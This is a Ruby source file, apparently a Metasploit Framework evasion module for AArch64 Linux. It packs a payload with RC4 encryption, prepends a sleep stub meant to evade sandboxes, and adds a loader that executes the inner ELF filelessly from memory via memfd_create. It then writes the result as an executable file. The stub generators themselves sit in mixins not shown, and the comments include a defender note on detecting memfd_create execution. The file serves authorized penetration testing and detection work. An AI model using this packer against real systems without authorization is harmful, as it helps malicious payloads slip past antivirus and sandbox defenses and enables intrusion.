Path: blob/master/modules/evasion/linux/aarch64/rc4_packer.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Evasion module that emits an AArch64 Linux ELF built from three stub
# generators supplied by the included mixins (sleep_evasion, rc4_decrypter,
# in_memory_load). The mixin implementations are not part of this file.
#
# Defender note: per the module description, the generated loader relies on
# memfd_create (Linux 3.17+) to run the inner ELF from memory. Since the inner
# ELF is passed through the RC4 stage, static signatures written against the
# inner payload presumably will not match the file on disk; telemetry on
# memfd_create followed by execution of a memfd-backed descriptor is the more
# reliable signal.
class MetasploitModule < Msf::Evasion

  include Msf::Payload::Linux::Aarch64::Rc4Decrypter
  include Msf::Payload::Linux::Aarch64::ElfLoader
  include Msf::Payload::Linux::Aarch64::SleepEvasion

  # Registers the module metadata and its two options.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'Linux RC4 Packer with In-Memory Execution',
      'Description' => %q{
        This evasion module packs Linux payloads using RC4 encryption
        and executes them from memory using memfd_create for fileless execution.
        Linux kernel version support: 3.17+
      },
      'Author' => ['Massimo Bertocchi'],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => [ARCH_AARCH64],
      'Targets' => [['Linux ARM64/AArch64', {}]],
      'DefaultTarget' => 0
    )
    super(module_info)

    # FILENAME is required; SLEEP_TIME is optional and defaults to 0.
    output_option = OptString.new('FILENAME', [true, 'Output filename', 'payload.elf'])
    sleep_option = OptInt.new('SLEEP_TIME', [false, 'Sleep Time for Sandbox Evasion', 0])
    register_options([output_option, sleep_option])
  end

  # Generates the packed ELF and writes it to the FILENAME option.
  #
  # Aborts with Failure::BadConfig when the encoded payload is blank.
  # The output path is used as given, so a relative FILENAME resolves against
  # the process working directory and an existing file there is overwritten.
  def run
    encoded = payload.encoded
    fail_with(Failure::BadConfig, 'Failed to generate payload') if encoded.blank?

    # Inner ELF: the encoded payload wrapped by the framework's ELF builder.
    inner_elf = Msf::Util::EXE.to_linux_aarch64_elf(framework, encoded)

    # Stub order matches the final layout: delay stub first, then the RC4
    # stage whose data is the in-memory loader followed by the inner ELF.
    delay_stub = sleep_evasion(seconds: datastore['SLEEP_TIME'])
    loader_with_elf = in_memory_load(inner_elf) + inner_elf
    rc4_stage = rc4_decrypter(data: loader_with_elf)

    # Outer ELF: the combined stubs wrapped by the same ELF builder.
    outer_elf = Msf::Util::EXE.to_linux_aarch64_elf(framework, delay_stub + rc4_stage)

    destination = datastore['FILENAME']
    File.binwrite(destination, outer_elf)
    # rwxr-xr-x: the artifact is readable and executable by every local user.
    File.chmod(0o755, destination)
  end
end